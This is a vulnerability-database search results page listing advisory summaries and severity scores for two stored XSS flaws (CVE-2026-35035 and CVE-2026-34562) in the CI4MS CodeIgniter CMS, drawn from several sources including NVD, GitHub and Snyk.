Lucene search
K

35 matches found

RedhatCVE
RedhatCVE
added 2026/04/07 5:3 p.m.5 views

CVE-2026-35035

CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to 0.31.2.0, the application fails to properly sanitize user-controlled input within System Settings – Company Information. Several administrative...

9CVSS6AI score0.00455EPSS
Exploits1References1
EUVD
EUVD
added 2026/04/06 5:53 p.m.5 views

EUVD-2026-19374

CI4MS: Company Information Public-Facing Page Full Platform Compromise & Full Account Takeover for All Roles & Privilege-Escalation via System Settings Company Information Stored DOM XSS...

7.2CVSS5.9AI score0.00455EPSS
Exploits1References2
OSV
OSV
added 2026/04/06 5:53 p.m.6 views

GHSA-5GHQ-42RG-769X CI4MS: Company Information Public-Facing Page Full Platform Compromise & Full Account Takeover for All Roles & Privilege-Escalation via System Settings Company Information Stored DOM XSS

An attacker can acheive Full Account Takeover & Privilege Escalation via Stored DOM Blind XSS on public-facing landing pages through the System Settings Company Information section which allows the injection of XSS payloads...

9.1CVSS5.8AI score0.00455EPSS
Exploits1References4
Snyk
Snyk
added 2026/04/06 5:53 p.m.3 views

Cross-site Scripting (XSS)

Overview ci4-cms-erp/ci4ms is a composer create-project ci4-cms-erp/ci4ms Affected versions of this package are vulnerable to Cross-site Scripting XSS via unsanitized input in the Company Information configuration fields, which are stored and later rendered on public-facing pages. An attacker can...

9CVSS6AI score0.00455EPSS
Exploits1References2
Github Security Blog
Github Security Blog
added 2026/04/06 5:53 p.m.7 views

CI4MS: Company Information Public-Facing Page Full Platform Compromise & Full Account Takeover for All Roles & Privilege-Escalation via System Settings Company Information Stored DOM XSS

An attacker can acheive Full Account Takeover & Privilege Escalation via Stored DOM Blind XSS on public-facing landing pages through the System Settings Company Information section which allows the injection of XSS payloads...

9CVSS5.2AI score0.00455EPSS
Exploits1References4Affected Software1
NVD
NVD
added 2026/04/06 5:17 p.m.5 views

CVE-2026-35035

CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to 0.31.2.0, the application fails to properly sanitize user-controlled input within System Settings – Company Information. Several administrative...

9CVSS0.00455EPSS
Exploits1References1
Cvelist
Cvelist
added 2026/04/06 4:49 p.m.20 views

CVE-2026-35035 CI4MS Company Information Public-Facing Page Full Platform Compromise & Full Account Takeover for All Roles & Privilege-Escalation via System Settings Company Information Stored DOM XSS

CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to 0.31.2.0, the application fails to properly sanitize user-controlled input within System Settings – Company Information. Several administrative...

7.2CVSS0.00455EPSS
Exploits1References1
ATTACKERKB
ATTACKERKB
added 2026/04/06 4:49 p.m.2 views

CVE-2026-35035

CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to 0.31.2.0, the application fails to properly sanitize user-controlled input within System Settings – Company Information. Several administrative...

7.2CVSS6AI score0.00455EPSS
Exploits1References2Affected Software1
Vulnrichment
Vulnrichment
added 2026/04/06 4:49 p.m.4 views

CVE-2026-35035 CI4MS Company Information Public-Facing Page Full Platform Compromise & Full Account Takeover for All Roles & Privilege-Escalation via System Settings Company Information Stored DOM XSS

CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to 0.31.2.0, the application fails to properly sanitize user-controlled input within System Settings – Company Information. Several administrative...

7.2CVSS6AI score0.00455EPSS
Exploits1References1
CVE
CVE
added 2026/04/06 4:49 p.m.18 views

CVE-2026-35035

Summary: CVE-2026-35035 affects CI4MS (CodeIgniter 4-based CMS skeleton). A stored XSS vulnerability exists in System Settings – Company Information where attacker-controlled fields (e.g., Company Name, Slogan, contact fields, Google Maps link, media fields) are input and persisted server-side, t...

9CVSS6AI score0.00455EPSS
Exploits1References1Affected Software1
Positive Technologies
Positive Technologies
added 2026/04/06 12:0 a.m.4 views

PT-2026-30680

Name of the Vulnerable Software and Affected Versions CI4MS versions prior to 0.31.2.0 Description CI4MS, a CodeIgniter 4-based CMS skeleton, is susceptible to a stored Cross-Site Scripting XSS issue. The application does not properly sanitize user-controlled input within the System Settings –...

9.1CVSS5.8AI score0.00455EPSS
Exploits1References8
CNNVD
CNNVD
added 2026/04/06 12:0 a.m.8 views

CI4MS 跨站脚本漏洞

CI4MS is an open-source blog page management tool developed by Ci4MS. Versions of CI4MS prior to 0.31.2.0 contained a cross-site scripting vulnerability. This vulnerability stemmed from the failure to properly clean up user-controlled inputs in the system settings – company information section. A...

9CVSS5.6AI score0.00455EPSS
Exploits1References1
RedhatCVE
RedhatCVE
added 2026/04/02 10:55 p.m.4 views

CVE-2026-34562

CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within System Settings – Company Information. Several...

9CVSS5.8AI score0.00274EPSS
Exploits1References1
NVD
NVD
added 2026/04/01 10:16 p.m.3 views

CVE-2026-34562

CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within System Settings – Company Information. Several...

9CVSS0.00274EPSS
Exploits1References2
EUVD
EUVD
added 2026/04/01 10:3 p.m.6 views

EUVD-2026-18074

CI4MS: System Settings Company Information Full Platform Compromise & Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS...

4.7CVSS5.8AI score0.00274EPSS
Exploits1References2
Snyk
Snyk
added 2026/04/01 10:3 p.m.3 views

Cross-site Scripting (XSS)

Overview ci4-cms-erp/ci4ms is a composer create-project ci4-cms-erp/ci4ms Affected versions of this package are vulnerable to Cross-site Scripting XSS via unsanitized input in the Company Information configuration fields within the system settings. An attacker can execute arbitrary JavaScript in...

9CVSS6AI score0.00274EPSS
Exploits1References2
OSV
OSV
added 2026/04/01 10:3 p.m.1 views

GHSA-V897-C6VQ-6CR3 CI4MS: System Settings (Company Information) Full Platform Compromise & Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS

Summary Vulnerability: Stored DOM XSS via System Settings – Company Information Same-Page Attribute Breakout & Persistent Payload Injection - Stored Cross-Site Scripting via Unsanitized Company Information Configuration Fields with Immediate Same-Page Execution Description The application fails t...

4.7CVSS6.2AI score0.00274EPSS
Exploits1References4
Github Security Blog
Github Security Blog
added 2026/04/01 10:3 p.m.5 views

CI4MS: System Settings (Company Information) Full Platform Compromise & Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS

Summary Vulnerability: Stored DOM XSS via System Settings – Company Information Same-Page Attribute Breakout & Persistent Payload Injection - Stored Cross-Site Scripting via Unsanitized Company Information Configuration Fields with Immediate Same-Page Execution Description The application fails t...

9CVSS6.2AI score0.00274EPSS
Exploits1References4Affected Software1
Vulnrichment
Vulnrichment
added 2026/04/01 9:23 p.m.2 views

CVE-2026-34562 CI4MS: System Settings (Company Information) Full Platform Compromise & Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS

CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within System Settings – Company Information. Several...

4.7CVSS5.8AI score0.00274EPSS
Exploits1References2
CVE
CVE
added 2026/04/01 9:23 p.m.9 views

CVE-2026-34562

CI4MS (CodeIgniter 4-based CMS skeleton) prior to 0.31.0.0 suffers a stored DOM XSS vulnerability in System Settings – Company Information. Attacker-controlled inputs in fields such as Company Name, Slogan, contact details, and Google Maps/ media links are stored server-side and rendered without ...

9CVSS5.8AI score0.00274EPSS
Exploits1References2Affected Software1
Rows per page
Query Builder